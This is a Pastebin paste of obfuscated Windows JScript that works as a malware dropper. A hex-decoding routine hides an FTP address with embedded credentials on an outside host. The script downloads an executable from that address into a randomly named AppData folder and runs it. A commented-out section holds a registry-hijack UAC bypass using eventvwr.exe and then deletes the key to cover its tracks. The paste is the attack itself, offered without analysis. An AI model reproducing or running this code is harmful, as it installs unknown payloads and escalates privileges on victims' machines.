Advertisement
Guest User

obfuscation your mom

a guest
Jan 24th, 2017
284
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.55 KB | None | 0 0
  1. var DTAVGVEAEI = {
  2. "00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,
  3. "10":16,"11":17,"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,
  4. "20":32,"21":33,"22":34,"23":35,"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,"2D":45,"2E":46,"2F":47,
  5. "30":48,"31":49,"32":50,"33":51,"34":52,"35":53,"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,"3F":63,
  6. "40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,
  7. "50":80,"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,
  8. "60":96,"61":97,"62":98,"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,"6C":108,"6D":109,"6E":110,"6F":111,
  9. "70":112,"71":113,"72":114,"73":115,"74":116,"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,"7E":126,"7F":127,
  10. "80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
  11. "90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,
  12. "A0":160,"A1":161,"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,
  13. "B0":176,"B1":177,"B2":178,"B3":179,"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,"BD":189,"BE":190,"BF":191,
  14. "C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,"CF":207,
  15. "D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,
  16. "E0":224,"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,
  17. "F0":240,"F1":241,"F2":242,"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,"FC":252,"FD":253,"FE":254,"FF":255
  18. };
  19. function CDNCRTHWDQ(n) {
  20. n = n.toString(16);
  21. if (n.length == 1) n = "0" + n;
  22. n = "%" + n;
  23. return unescape(n);
  24. }
  25. function NCRCGRCEIC(DWHMMFBFFB, ENMQCRRZGQ) {
  26. FZBWXCQNHI = new ActiveXObject('MSXML2.XMLHTTP');
  27. IRDADQWETG = new ActiveXObject("ADODB.Stream");
  28.  
  29. FZBWXCQNHI.Open("GET", DWHMMFBFFB, false);
  30. FZBWXCQNHI.Send();
  31.  
  32. IRDADQWETG.type = 1 ////binary
  33. IRDADQWETG.open();
  34. IRDADQWETG.write(FZBWXCQNHI.responseBody);
  35. IRDADQWETG.savetofile(ENMQCRRZGQ, 2); ////overwrite
  36. }
  37.  
  38.  
  39. function diferntao(tamanho)
  40. {
  41. var nominal = "aliockzncxzurycnbzmc12345678";
  42. var capixada = "";
  43. for (var i = 0; i < tamanho; i++) {
  44. var rnum = Math.floor(Math.random() * nominal.length);
  45. capixada += nominal.substring(rnum, rnum + 1);
  46. }
  47. return capixada;
  48. }
  49. var bustaozao = diferntao("9");
  50.  
  51. environmentVars = new ActiveXObject("WScript.Shell").Environment("Process");
  52. var RDVCXCGCWW = environmentVars("USERNAME");
  53. var VEEIXVEZGF = "C:\\Users\\" + RDVCXCGCWW + "\\AppData\\Local\\" + bustaozao;
  54. oFSO = new ActiveXObject("Scripting.FileSystemObject");
  55. oFSO.CreateFolder(VEEIXVEZGF)
  56. var CBEHCTAFEV = VEEIXVEZGF;
  57. function BGGZXGXVCC(str) {
  58. str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
  59. var result = "";
  60. var nextchar = "";
  61. for (var i = 0; i < str.length; i++) {
  62. nextchar += str.charAt(i);
  63. if (nextchar.length == 2) {
  64. result += CDNCRTHWDQ(DTAVGVEAEI[nextchar]);
  65. nextchar = "";
  66. }
  67. }
  68. return result;
  69. }
  70. var TEGFGHATRD = "\\" + BGGZXGXVCC("597876636F6269742E657865");
  71. var MHENMCIBZF = "\\MECMCEFGXR";
  72. var FGHRRECEIB = BGGZXGXVCC("3130323033306D61");
  73.  
  74. NCRCGRCEIC(BGGZXGXVCC("6674703A2F2F616D656768696E69616E613A616D656768696E69616E61407777772E616D656768696E69616E612E6F72672E61722F6D6F64756C6F2F597876636F6269742E646174") , CBEHCTAFEV + TEGFGHATRD);
  75.  
  76.  
  77. var QARQXECXCC = CBEHCTAFEV + TEGFGHATRD;
  78. WScript.Sleep(500);
  79. var WSHELL = new ActiveXObject("Wscript.Shell");
  80. WSHELL.Exec(QARQXECXCC)
  81. var WshShell = WScript.CreateObject ("WScript.Shell");
  82. /*WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", WMVRGDQRNE, "REG_SZ");
  83. var RHFBCZZHQD = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe";
  84. EXTAMWVDMX = new ActiveXObject("Wscript.Shell");
  85. EXTAMWVDMX.Run(RHFBCZZHQD, 1, 1);
  86. WScript.Sleep(60000);
  87. var wshShell = new ActiveXObject("WScript.Shell");
  88. wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");*/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement